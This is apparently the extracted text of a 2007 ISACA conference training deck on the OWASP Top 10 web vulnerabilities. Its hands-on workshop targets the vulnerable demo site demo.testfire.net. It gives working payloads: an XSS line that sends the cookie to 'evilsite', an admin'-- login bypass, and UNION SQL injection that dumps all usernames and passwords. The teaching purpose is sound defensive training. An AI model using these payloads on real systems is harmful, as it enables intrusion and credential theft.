2007 SF ISACA Fall Conference - Hacking 101 Final · 2008. 8. 12. · SPI Dynamics Cenzic Acunetix White-Box Fortify Ounce Labs Secure Soft Klocwork ... (Web Application Security

San Francisco Chapter

Hacking 101:Understanding the Top Web Application Vulnerabilities and How to Protect Against

the Next Level of Attack

Armando Bioc

Security Consultant

Watchfire, an IBM Company


2007 Fall Conference

2

Agenda

• Module 1: Security Landscape

• Module 2: – Top Attacks Overview

– Demo of Manual Techniques

• Module 3: Hands-on Workshop

• Module 4: Demo of Automated Techniques

• Module 5: An Enterprise Vision


Module 1: Security Landscape



4

Objective

1. Understand the web application environment

2. Understand and differentiate between network and application level vulnerabilities

3. Understand where the vulnerabilities exist



5

1. Compliance Management

2. Risk Management

3. Identity Management

4. Authorization Management

5. Accountability Management

6. Availability Management

7. Configuration Management

8. Incident Management

Eight Principles of Security Management

SecuritySecurity



6

High Level Network ArchitectureSecuritySecurity



7

Host-Based Network

ConfigurationManagement

Incident Management

Policy & Compliance

Patching & Remediation

Forensics Investigation

Security Product Landscape

Security Management

Hewlett-PackardCACiscoMicrosoftSun

ArcSightNetForensicsSymantecCANet Intelligence

NetIQSymantecCAHewlett-PackardAltiris

PatchlinkShavlinkSt. BernardMicrosoftHewlett-Packard

GuidanceNiksunCASenSageNet Intelligence

Application

SymantecNetIQISSCAHarris STAT

Database OnlyAppSec IncNGS Software

Black-BoxWatchfireSPI DynamicsCenzicAcunetix

White-BoxFortifyOunce LabsSecure SoftKlocwork

Vulnerability Assessment

Tenable NessusISSQualyseEyeMcAfee

SecuritySecurity



8

Black Box vs. White Box: Where?

function b64(sText) {

if (!sText) { sText = ''; }

if (typeof sText == 'object') {sText = String(sText);if (sText.match(/^\[(.*)+\]$/)) {sText = 'unknown';

}}

var sOut = '';var chr1, chr2, chr3 = '';var enc1, enc2, enc3, enc4 = '';var i = 0;

var keyStr = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';

}

UI Application Logic

DB

FS

User

Infrastructure

SecuritySecurity



9

Black Box vs. White Box: What?

function b64(sText) {

if (!sText) { sText = ''; }

if (typeof sText == 'object') {sText = String(sText);if (sText.match(/^\[(.*)+\]$/)) {sText = 'unknown';

}}

var sOut = '';var chr1, chr2, chr3 = '';var enc1, enc2, enc3, enc4 = '';var i = 0;

var keyStr = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';

}

UI Application Logic

DB

FS

User

Infrastructure

SecuritySecurity



10

High Level Web Application Architecture Review

(Presentation)App Server(BusinessLogic)

DatabaseClient Tier(Browser)

Middle TierData Tier

Firewall

Sensitive data is

stored here

SSL

Protects

Transport Protects Network

InternetInternet

CustomerApp is deployedhere



11

Perimeter IDS IPS

Intrusion

Detection

System

Intrusion

Prevention

System

Network Defenses for Web ApplicationsSecuritySecurity

App Firewall

Application

Firewall

Firewall

System Incident Event Management (SIEM)



12

Web Applications – Shared Traits

• Get input from user in different ways

– Path, Parameters, Cookies, Headers, etc.

• Use back-end servers

– DB, LDAP/AD Server, etc.

• Use session tokens (cookie, parameter, path…)

– Session tokens may be persistent or not

• Hold public & private information

– Sensitive info often past the login page



13

Web Application Security: What Can Happen?

• Sensitive data leakage

– Customer, partner or company data

• Identity Theft

– Hacker impersonating as trusted user

• Defacement – Content Modification

– Hurts brand, misleads customers, etc.

• Application Shutdown (Site Unavailable)

– Lack of access can cause major loses



14

Open Source & Manual Products

• Proxies

– WebScarab

– Fiddler

– Paros

– BURP

– Spike

• HTTP Editors

– [See above]

– Mozilla Tamper Data

– NetCat

• Fuzzers

– SensePost Crowbar

– JBroFuzz

• Database Exploit

– Absinthe

– SQL Power Injector

• General Exploit

– Metasploit



15

Network

Operating System

Applications

Database

Web Server

Web Server Configuration

Third-party Components

Web Applications

Client-Side Custom Web Services

Web Applications


Where are the Vulnerabilities?

Web Applications




16

Network

Operating SystemOperating System

ApplicationsApplications

DatabaseDatabase

Web Server



Web Applications


Web Applications



Network

Blackbox scanners that evaluate all network objects for patches and vulnerabilities



17

NetworkNetwork

Operating System

Applications

DatabaseDatabase

Web Server


Web Server


Third-party ComponentsThird-party Components

Web Applications


Web Applications



Host

Authenticated agents that evaluate the underlying operating system



18

NetworkNetwork



Database

Web Server


Web Server



Web Applications


Web Applications



Database

Evaluate the database for missing patches, poor configuration and vulnerabilities



19

NetworkNetwork



DatabaseDatabase

Web Server



Web Applications



App Scanners

Scan the web application to uncover vulnerabilities



20

NetworkNetwork



DatabaseDatabase

Web Server


Web Server



Web Applications



Code Scan

Parse software source code to determine policy violations and poor practices



21

Web Applications


Web Applications



Network

Operating System

Applications

Database

Web Server



Web Applications



Top Attacks Overview



23

We Use Network Vulnerability Scanners

We Use Network Vulnerability Scanners

The Myth: “Our Site Is Safe”

We Have Firewalls in Place

We Have Firewalls in Place We Audit It Once a

Quarter with Pen Testers

We Audit It Once a Quarter with Pen Testers

SecuritySecurity

We Use SSL

Encryption

We Use SSL

Encryption



24

Network Server

WebApplications

The Reality:Security and Spending Are Unbalanced

% of Attacks % of Dollars

75%

10%

25%

90%

Sources: Gartner, Watchfire

Security Spending

of All Attacks on Information Security

Are Directed to the Web Application Layer75%75%

of All Web Applications Are Vulnerable2/32/3

SecuritySecurity



25

2006 Vulnerability Statistics (31,373 sites)

** http://www.webappsec.org/projects/statistics/



26

What is a Web Application?

• The business logic that enables:– User’s interaction with Web

site

– Transacting/interfacing with back-end data systems (databases, CRM, ERP etc)

• In the form of:– 3rd party packaged software;

i.e. web server, application server, software packages etc.

– Code developed in-house / web builder / system integrator

Input and Output flow through each layer of the application

A break in any layer breaks the whole application

Web Server

User Interface Code

Front end Application

Backend Application

Database

Data

User Input

HTML/HTTP

Browser



27

Infrastructure vs. Application Security Issues

Internal/External Audits, Automated Scanners

App Security ScannersPatch Management system

Detection

Training & Scanners – across the Development Life Cycle

Update patches, use trusted 3rd

party softwareWhat to do

Probing hacks, suspicious content, information leakage

Known vulnerabilities (0-day), signature based

Method of

Exploits

Application Code, often resides on Application Server

3rd party infrastructure (web server, OS, etc.)

Location of

Vulnerability

Insecure development of your own applications

Insecure development or deployment of 3rd party SW

Cause of Defect

Application Specific

VulnerabilitiesInfrastructure Vulnerabilities



28

WASC

• Web Application Security Consortium (WASC)

Purpose:

– To develop, adopt, and advocate standards for web application security

• Official web site: www.webappsec.org

• Web Security Threat Classification projecthttp://www.webappsec.org/projects/threat/v1/WASC-TC-v1_0.pdf

Purpose:

– Clarify and organize the threats to the security of a web site

– Develop and promote industry standard terminology for these issues



29

WASC – Threat Classifications(Web Application Security Consortium) www.webappsec.org

Misdirect customers to bogus site

Change parameters ie.total contribution>100%

Attacks designed to execute remote commands on the web site by manipulating user-supplied input fields.

• Buffer Overflow

• Format String Attack

• LDAP Injection

• OS Commanding

• SQL Injection

• SSI Injection

• XPath Injection

Command Execution

The abuse or exploitation of a web site’s users (breaching trust relationships between a user and a web site).

• Content Spoofing

• Cross Site Scripting

Client-side Attacks

Attacks that target a web site’s method of determining if a user, service or application has the necessary permissions to perform a requested action.

• Credential/Session Prediction

• Insufficient Authorization

• Insufficient Session Expiration

• Session Fixation

Authorization

Attacks that target a web site’s method of validating the identity of a user, service or application.

• Brute Force

• Insufficient Authentication

• Weak Password Recovery Validation

Authentication

Example Business ImpactAttack TypesApplication Threat



30

WASC – Threat Classifications(Web Application Security Consortium) www.webappsec.org

The abuse or exploitation of a web application logic flow (password recovery, account registration, auction bidding and eCommerce purchasing are examples of application logic).

• Abuse of Functionality

• Denial of Service

• Insufficient Anti-automation

• Insufficient Process Validation

Logical Attacks

Attacks designed to acquire system specific information about a web site. This includes software distribution, version numbers, patch levels, and also secure file locations.

• Directory Indexing

• Information Leakage

• Path Traversal

• Predictable Resource Location

Information Disclosure

Example Business ImpactAttack TypesApplication Threat



31

OWASP

• Open Web Application Security Project

Purpose: Dedicated to finding and fighting the causes of insecure software.

• Official web site: www.owasp.org

• The OWASP Top Ten project http://www.owasp.org/index.php/OWASP_Top_Ten_Project

• Purpose:

– A broad consensus about what the most critical web application security flaws are

– Raise awareness of web application security issues

• We will use the Top 10 list to cover some of the most common security issues in web applications



32

OWASP Top 10 Application Attacks

Hackers can impersonate legitimate users, and control their accounts.

Identity Theft, Sensitive Information Leakage, …

Cross Site scripting

Hacker can forcefully browse and access a page past the login page

Hacker can access unauthorized resourcesFailure to Restrict URL Access

Unencrypted credentials “sniffed” and used by hacker to impersonate user

Sensitive info sent unencrypted over insecure channel

Insecure Communications

Confidential information (SSN, Credit Cards) can be decrypted by malicious users

Weak encryption techniques may lead to broken encryption

Insecure Cryptographic Storage

Hacker can “force” session token on victim; session tokens can be stolen after logout

Session tokens not guarded or invalidated properly

Broken Authentication & Session Management

Malicious system reconnaissance may assist in developing further attacks

Attackers can gain detailed system informationInformation Leakage and Improper Error Handling

Blind requests to bank account transfer money to hackerAttacker can invoke “blind” actions on web applications, impersonating as a trusted user

Cross-Site Request Forgery

Web application returns contents of sensitive file (instead of harmless one)

Attacker can access sensitive files and resources

Insecure Direct Object Reference

Site modified to transfer all interactions to the hacker.Execute shell commands on server, up to full control

Malicious File Execution

Hackers can access backend database information, alter it or steal it.

Attacker can manipulate queries to the DB / LDAP / Other system

Injection Flaws

Example ImpactNegative ImpactApplication Threat

The OWASP Top 10 Application Attacks



33

1. Cross-Site Scripting (XSS)

• What is it?

– Malicious script echoed back into HTML returned from a trusted site, and runs under trusted context

• What are the implications?

– Session Tokens stolen (browser security circumvented)

– Complete page content compromised

– Future pages in browser compromised



34

XSS Example I

HTML code:



35

XSS Example II

HTML code:



36

XSS – Details

• Common in Search, Error Pages and returned forms.– But can be found on any type of page

• Any input may be echoed back– Path, Query, Post-data, Cookie, Header, etc.

• Browser technology used to aid attack– XMLHttpRequest (AJAX), Flash, IFrame…

• Has many variations

– XSS in attribute, DOM Based XSS, etc.



37

Cross Site Scripting – The Exploit Process

Evil.org

User bank.com

1) Link to bank.comsent to user viaE-mail or HTTP

2) User sends script embedded as data

3) Script/data returned, executed by browser

4) Script sends user’scookie and session information without the user’s consent or knowledge

5) Evil.org uses stolensession information toimpersonate user



38

Exploiting XSS

• If I can get you to run my JavaScript, I can…

– Steal your cookies for the domain you’re browsing

– Track every action you do in that browser from now on

– Redirect you to a Phishing site

– Completely modify the content of any page you see on this domain

– Exploit browser vulnerabilities to take over machine

– …

• XSS is the Top Security Risk today (most exploited)



39

Sticky/Embedded XSS (XSS Worms)

• Embedding malicious script in persistent location

– “Talkback” section

– Forum/Newsgroup

• Boosted with Web 2.0 trend

– Customizable content

– More user content (communities)

• XSS Can “Infest” more pages - Worm

– MySpace worm (Samy, October 2005)



40

2. Injection Flaws

• What is it?

– User-supplied data is sent to an interpreter as part of a command, query or data.


– SQL Injection – Access/modify data in DB

– SSI Injection – Execute commands on server and access sensitive data

– LDAP Injection – Bypass authentication

– …



41

SQL Injection

• User input inserted into SQL Command:

– Get product details by id:Select * from products where id=‘$REQUEST[“id”]’;

– Hack: send param id with value ‘ or ‘1’=‘1

– Resulting executed SQL:Select * from products where id=‘’ or ‘1’=‘1’

– All products returned



42

SQL Injection Example I



43

SQL Injection Example II



44

SQL Injection Example - Exploit



45

SQL Injection Example - Outcome



46

Injection Flaws – More Info

• One SQL Injection compromises entire DB

– Doesn’t matter if it’s a remote page

• Not limited to SQL Injection

– LDAP, XPath, SSI, MX (Mail)…

– HTML Injection (Cross Site Scripting)

– HTTP Injection (HTTP Response Splitting)



47

Injection Flaws (SSI Injection Example) Creating commands from input



48

The return is the private SSL key of the server



49

3. Malicious File Execution

• What is it?

– Application tricked into executing commands or creating files on server


– Command execution on server – complete takeover

– Site Defacement, including XSS option



50

Malicious File Execution – Example I



51

Malicious File Execution – Example cont.



52

Malicious File Execution – Example cont.



53

4. Insecure Direct Object Reference

• What is it?

– Part or all of a resource (file, table, etc.) name controlled by user input.


– Access to sensitive resources

– Information Leakage, aids future hacks



54

Insecure Direct Object Reference -Example



55

Insecure Direct Object Reference –Example Cont.



56

Insecure Direct Object Reference –Example Cont.



57

5. Cross Site Request Forgery (CSRF/XSRF)

• What is it?

– Tricking a victim into sending an unwitting (often blind) request to another site, using the user’s session and/or network access.


– Internal network compromised

– User’s web-based accounts exploited



58

XSRF Exploit Illustration

1) User browses page with malicious

content

2) Script (or link) is downloaded and

executed in browser

Evil.org

3) Money Transfered

Bank.comWebMail

Wireless Router

3) All mails forwarded to

hacker

3) Router opened for outside access

4) Money Withdrawn

4) Private mails accessed, possibly containing passwords

4) Firewalls surpassed, internal computers hacked

Victim



59

XSRF vs. XSS

• XSS Exploits the trust a user gives a site

– Cookies and data access to specific domain

• XSRF Exploits the trust a site gives a user

– User “logged in” to site or has access to site (Intranet)

• XSRF may be delivered via XSS (or Sticky XSS)

• XSS may be auto-exploited via XSRF

– XSRF on one site exploit XSS on other – hands free



60

6. Information Leakage and Improper Error Handling

• What is it?

– Unneeded information made available via errors or other means.


– Sensitive data exposed

– Web App internals and logic exposed (source code, SQL syntax, exception call stacks, etc.)

– Information aids in further hacks



61

Information Leakage - Example



62

Improper Error Handling - Example



63

Information Leakage – Different Username/Password Error



64

7. Broken Authentication and Session Management

• What is it?

– Session tokens aren’t guarded and invalidated properly


– Session tokens can be planted by hacker in XSS/XSRF attack, hence leaked

– Session tokens more easily available (valid longer, less protection) to be stolen in different ways



65

Broken Authentication and Session Management - Examples

• Unprotected Session Tokens

– Session ID kept in Persistent Cookie

– Not using http-only value for cookies

• Sessions valid for too long

– Session not invalidated after logout

– Session timeout too long

• Session fixation possible

– Session ID not replaced after login (hence can be fixed)



66

8. Insecure Cryptographic Storage

• What is it?

– Weak or no cryptographic protection on sensitive resources at rest

– Lack of safeguards on keys


– Session tokens can be predicted (due to weak, often homegrown, algorithms)

– Sensitive data available through DB access (internal hacker, SQL Injection, etc.)



67

Insecure Cryptographic Storage: Weak Session Token

• Hacker samples session IDs and gets:1,2,4,6,7,10,11,15…

• Can you predict other valid sessions?(Hint: Other users may enter site and get sessions during the hacker’s sampling)

• Points to consider:

– Doesn’t need to be that simple…

– Keys may be predictable (e.g. timestamp)



68

9. Insecure Communication

• What is it?

– Sensitive data sent over unencrypted channels


– Data can be stolen or manipulated by Internal or External hacker



69

Insecure Communication: Points to Consider

• Not only the login page is sensitive

– Anything after it is too, and maybe more

• Internal Hackers are a threat

– Encrypt internal communications as well

• Use strong encryption keys

– See previous topic…



70

10. Failure to Restrict URL Access

• What is it?

– Resources that should only be available to authorized users can be accessed by forcefully browsing them


– Sensitive information leaked/modified

– Admin privileges made available to hacker



71

Failure to Restrict URL Access - Admin User login

/admin/admin.aspx



72

Simple user logs in, forcefully browses to admin page



73

Failure to Restrict URL Access:Privilege Escalation Types

• Access given to completely restricted resources

– Accessing files that shouldn’t be served (*.bak, “Copy Of”, *.inc, *.cs, ws_ftp.log, etc.)

• Vertical Privilege Escalation

– Unknown user accessing pages past login page

– Simple user accessing admin pages

• Horizontal Privilege Escalation

– User accessing other user’s pages

– Example: Bank account user accessing another’s



74

OWASP Top 10 Application Attacks

Hackers can impersonate legitimate users, and control their accounts.

Identity Theft, Sensitive Information Leakage, …

Cross Site scripting

Hacker can forcefully browse and access a page past the login page

Hacker can access unauthorized resourcesFailure to Restrict URL Access

Unencrypted credentials “sniffed” and used by hacker to impersonate user

Sensitive info sent unencrypted over insecure channel

Insecure Communications

Confidential information (SSN, Credit Cards) can be decrypted by malicious users

Weak encryption techniques may lead to broken encryption

Insecure Cryptographic Storage

Hacker can “force” session token on victim; session tokens can be stolen after logout

Session tokens not guarded or invalidated properly

Broken Authentication & Session Management

Malicious system reconnaissance may assist in developing further attacks

Attackers can gain detailed system informationInformation Leakage and Improper Error Handling

Blind requests to bank account transfer money to hackerAttacker can invoke “blind” actions on web applications, impersonating as a trusted user

Cross-Site Request Forgery

Web application returns contents of sensitive file (instead of harmless one)

Attacker can access sensitive files and resources

Insecure Direct Object Reference

Site modified to transfer all interactions to the hacker.Execute shell commands on server, up to full control

Malicious File Execution

Hackers can access backend database information, alter it or steal it.

Attacker can manipulate queries to the DB / LDAP / Other system

Injection Flaws

Example ImpactNegative ImpactApplication Threat

The OWASP Top 10 Application Attacks


Module 3: Hands-on Workshop



76

Objective

Hacking 101:

• Understand reconnaissance and profiling

1. Hands-on: Find vulnerabilities and exploit

a) Failure to restrict URL access and information leakage

b) Cross site scripting (XSS)

c) SQL Injection

d) Advanced SQL Injection

2. Understand the difference between a vulnerability and an exploit



77

Profiling a web application



78

Reconnaissance and Profiling

• Platform– Technologies

– Application servers

– Web servers

– Web server authentication

– Database usage

– Database type

– Third-party components

• Application– Authentication

– Authorization

– Web based administration

– User contributed content

– Client side validation

– Password creation

– Session state

– Error handling

– Application logic



79

How much did you find?

• Platform– .NET, JavaScript

– IIS 5.0+

– Anonymous web server authentication

– Database in use

– MS SQL? Access?

– User management connections?

• Application– Form based authentication

– User based authorization

– Yes = /Admin

– No social contribution areas

– No password reset

– Cookies (several)

– Custom error pages

– CGI execution



80

Task 1: Access the Administration section

• Step 1: Forceful browse to administration section– Does it exist?

– The URL for the banking application is: http://demo.testfire.net/bank

• What might the administrative application be?

– Is there a default page?

– What might you name a login page?

• What was it for the banking application?

– http://demo.testfire.net/bank/login.aspx

• Step 2: Ask some questions about the login page?– Is there a username associated with the password?

– Is the password static?

– What might I use for a password?

– Where might I look for a password?

• Step 3: Exploit



81

!!ActionNavigate to admin directory

!! We learn …Administration Section Exists



82

!!ActionNavigate to login.aspx page

!! We learn …Common naming practices



83

!!ActionView page source

!! We learn …The PASSWORD



84

Solution – Forceful browsing

• Navigate to http://demo.testfire.net

• Try http://demo.testfire.net/administration

– Fails

• Try http://demo.testfire.net/admin

– Success

– No default page

• Try http://demo.testfire.net/admin/logon.aspx

– Failure

• Try http://demo.testfire.net/admin/login.aspx

– Success



85

Solution – Information Leakage

• The administration section uses a single password

• Try to guess the password

– Password, password, password1, Password1

– Admin, admin, Admin1, admin1

– Altoro, Altoro, Altoro1, altoro1

• View the page source

• Search for comments

– Success



86

Task 2: Steal the user cookie

• Step 1: Determine the best attack method– How do I force the client to run my commands?

– What scripting language are almost all browsers able to execute?

• Step 2: Find the application vulnerability

– Where might I be able to include content within an application?

– What does the payload look like?

– How do I access the client cookie?

• Step 3: Exploit

– Discussion Topic

• How do I send this cookie from the victim to the attacker?



87

!!ActionEnter search text

!! We learn …Content is echoed back to page



88

!!ActionEnter javascript command

!! We learn …Output is not encoded



89

!!ActionEnter JS command with cookie

!! We learn …The cookie is available



90

Solution – Cross site scripting (XSS)

• Navigate to http://demo.testfire.net

• Search for any query term

– Output is reflected to the page

• Query: <script>alert(1)</script>

– Output is not encoded

• Query: <script>alert(document.cookie)</script>– Cookie is available and can be stolen

• How would I exploit this?– Social engineering - send URL of search query to victim– <script>document.write('<img src=http://evilsite/'+document.cookie);</script>



91

Task 3: Login without credentials

• Step 1: Find the login page

– Can you create an account?

– Can you determine a valid username?

• Step 2: Can you cause an error?

– What information do you learn when you cause an error?

– What database is this using?

– What are techniques that you might use?

– What characters terminate a SQL statement?

• Step 3: Exploit



92

!!ActionUsername, no password

!! We learn …Uses client-side JS validation



93

!!ActionEnter your name into the username and a single tick into the password



94

!! We can guess that …

SQLQuery = “SELECT Username FROM Users WHERE Username = ‘” & strUsername & “’ AND Password = ‘” & strPassword & “’”



95

!!ActionEnter your name, a tick, double hyphen and whatever password you want!! We learn …Double hyphen is used for a comment, the result is that every thing after the double hyphen is now treated as a comment



96

!!ActionEnter admin'-- and any password you want!! We learn …Valid SQL statement = loginSELECT Username FROM Users WHERE Username = ‘jsmith’ AND Password = ‘demo1234’SELECT Username FROM Users WHERE Username = ‘admin’ OR 1=1 --’ AND Password = ‘1’



97

Solution – Profile the login page

• Navigate to http://demo.testfire.net/bank/login.aspx

• Enter sample username without password– Usage of client-side JavaScript

• Enter sample username with password

– No credential enumeration

• Enter sample username with single tick (') as password

– SQL injection vulnerability

– Verbose error messages

– Column names of username and password



98

Solution – SQL Injection

• Enter sample username with password of '--

– Double hyphen terminates a SQL statement

• Enter probable username (admin) with special characters appended '--

– Successful exploitation of SQL injection



99

Task 4: Steal all the usernames and passwords

• Step 1: Find a page that lists information– What page lists information?

– Does the page accept user input in any way?

– Think about how this information is pulled from the database?

• Step 2: Find the vulnerability– How do I manipulate the input to find a vulnerability?

– What steps should I try to “break the system”

• Step 3: Exploit

– What steps are required to make this happen?



100

!!ActionStart in current session

!! We learn …The admin has no bank accounts



101

!!ActionEnter some date in the future

!! We learn …No user activity



102

!!ActionSingle tick in form field

!! We learn …Vulnerable to SQL injectionColumn named userid



103

!!ActionEnter username and password1/1/2010 union select 1 from users--

!! We learn …Requires four columns in query



104

!!ActionEnter four columns in query1/1/2010 union select 1,1,1,1 from users--

!! We learn …SQL injection succeeds



105

!!ActionEnter valid SQL command. We already know 3 columns (userid, username, password) and a table in the database!!!1/1/2010 union select userid,null,'username: '+username+ ' password:'+password,null from users—!! We learn …All the usernames and passwords



106

Solution – Find the vulnerability

• Use technique from the last task to login

• Find a page that lists information from the DB

– http://demo.testfire.net/bank/transactions.aspx

• Enter a single tick (') in the first form field

– Vulnerable to SQL injection

– Verbose error messages

– Column named userid (we already know about username and password)



107

Solution – Complex SQL Injection

• Query: 1/1/2010 union select 1 from users--– Error message about matching columns

– Learn that table users exists

• Query: 1/1/2010 union select 1,1,1,1 from users--

– Successful in executing query

• We already know 3 columns (userid, username, password) and a table in the database

• Query: 1/1/2010 union select userid,null,username+' '+password,null from users--– Successful exploitation



108

Questions

1. Understand reconnaissance and profiling

2. Hands-on: Find vulnerabilities and exploit

a) Forceful browsing and information leakage

b) Cross site scripting (XSS)

c) SQL Injection

d) Advanced SQL Injection

3. Understand the difference between a vulnerability and an exploit


Module 4: Automated Techniques



110

Objective

1. Understand how automation can help uncover vulnerabilities

2. Demonstration of automated vulnerability assessment

3. Understand the limitations of vulnerability assessment



111

Welcome to AppScan

• Double click on Watchfire’s AppScan

• Choose Open



112

Pick a Template

• Choose Default under Predefined Templates



113

Type of Scan

• Select the type of scan you wish to perform

• Select Web Application Scan

• Click Next



114

What to scan

• Select the scanned application

• Type http://demo.testfire.net

• Click Next >



115

Login

• Choose Automatic login

• User name: jsmith Password: Demo1234

• Click Next

Note: you may want to

choose the record option

and follow the steps



116

What to test

Select the test policy

• Click on ‘Load’

• Select ‘Application-Only’

• Click OK

• Click Next

For this exercise we will test

just for application level

vulnerabilities



117

Start the scan

• Select ‘Start a full automatic scan’

AppScan will perform

Explore and execute

Tests



118

View the results


An Enterprise Vision



120

QA Test SecurityAuditor

BusinessOwner

Developer

Why isn’t the app working?

Why isn’t the app working?

What’s wrong with the code?

What’s wrong with the code?

Where are the the bugs?

Where are the the bugs?

What is our risk exposure?

What is our risk exposure?

What are the root causes?What are the root causes?

Asking the Wrong QuestionSolutionSolution



121

CHASING VULNERABILITIES DOESN’T WORKCHASING VULNERABILITIES DOESN’T WORK555

Can help build education programsCan help build education programs444

Highlights pro-active securityHighlights pro-active security333

Eliminates over-reportingEliminates over-reporting222

Takes the focus off the symptomsTakes the focus off the symptoms111

Understanding the Root CausesSolutionSolution



122

Online Risk Management for the Enterprise

People

Process

Technology

SolutionSolution



123

The People Factor

• Repeatable, measurable education system– Eight principles of security

– Six primary threat classifications

• Resource library

– Corporate policy

– Best practices

– Specific process with security artifacts

• Feedback Loop

– Development, QA and Internal

– Support and External

• MEASUREMENT

People

Process

TechnologySolutionSolution



124

The Process Factor

• Defined secure lifecycle

– Risk Profiling

– Architectural Risk Analysis / Threat Modeling

– Defined inputs and outputs

– Checkpoints and Gates

• Feedback loop for process improvement

– Internal

– External

• MEASUREMENT

People

Process




125

The Technology Factor

• Automated analysis– Strengths

• Technical vulnerabilities

• Scale and cost

– Weaknesses

• Architectural and logical design flaws

• Manual analysis

– Strengths

• The “human factor”

• Design flaws

– Weaknesses

• Costly (time and money)

People

Technology

Process

SolutionSolution



126

Security Considerations in the SDLC

The Foundation

1. Playbook2. Resource Library3. Enterprise Metrics4. SDLC5. Training Program

Define

• Assign Security Expert• Risk Analysis

Design

• Architectural Risk Analysis• Threat Modeling• Abuse Cases

Build

• Component Testing• Peer Code Review• Build Testing

Test

• QA Testing• Formal Security Assessment• Formal Code Review

Deploy

• Quarterly Audit

People

Process




127

Outsourcing?

The Foundation

1. Playbook2. Resource Library3. Enterprise Metrics4. SDLC5. Training Program

Define

• Assign Security Expert• Risk Analysis

Test

• Formal Security Assessment

Deploy

• Quarterly Audit

People

Process




128

Foundation ComponentsPeople

Process

Technology

• Playbook

– Corporate Policy

– Exception Handling

• Resource Library

– Security Principles

– Threat Classification

– Certified Components

– Feedback Mechanism (Inside, Outside)

SolutionSolution



129

Design Build Test DeployDefine

Application Security - When?

People

Process

Technology

Build Audits QA Audits

Code

Review

White BoxWhite Box222

Risk Profile Threat Modeling

Build Audits

QA Audits Security

Assessment

Quarterly

Audits

Black BoxBlack Box111

Component Tests

SolutionSolution



130

Cost to Fix dramatically increases Cost to Fix dramatically increases

the longer you wait to testthe longer you wait to test

Financial ImpactPeople

Process




131

Security Testing In the Software Lifecycle

Build

Developers

SDLCSDLC

Developers

Developers

Coding QA Security Production

People

Process




132

Application Security Maturity Model

Difficulty & Cost of Test

% Applications Tested

High

Low

Low High

Security Team

Security Team

Security Team

QA Team

QA Team

Development Team

Phase 1 Phase 2 Phase 3

Criticality & Risk of App.

People

Process




133

Q & A

Questions?



134

Additional Resources

• OWASP

– www.owasp.org

– Top Ten List

– Secure Development

• Web Application Security Consortium

– www.webappsec.org

– Threat Classification

– Web Hacking Incidents Database



135

Additional Resources

• Download AppScan 7.6 - http://www.watchfire.com

• Latest whitepapers visit:http://www.watchfire.com/news/whitepapers.aspx

• Visit Watchfire at one of our upcoming showshttp://www.watchfire.com/news/events.aspx

• Register for upcoming web seminars visithttp://www.watchfire.com/news/seminars.aspx

• Contact us at [email protected]


Thanks for joining me today!

Armando Bioc

Office: 650-592-5274

[email protected]

www.watchfire.com/securityzone

2007 SF ISACA Fall Conference - Hacking 101 Final · 2008. 8. 12. · SPI Dynamics Cenzic Acunetix White-Box Fortify Ounce Labs Secure Soft Klocwork ... (Web Application Security

Documents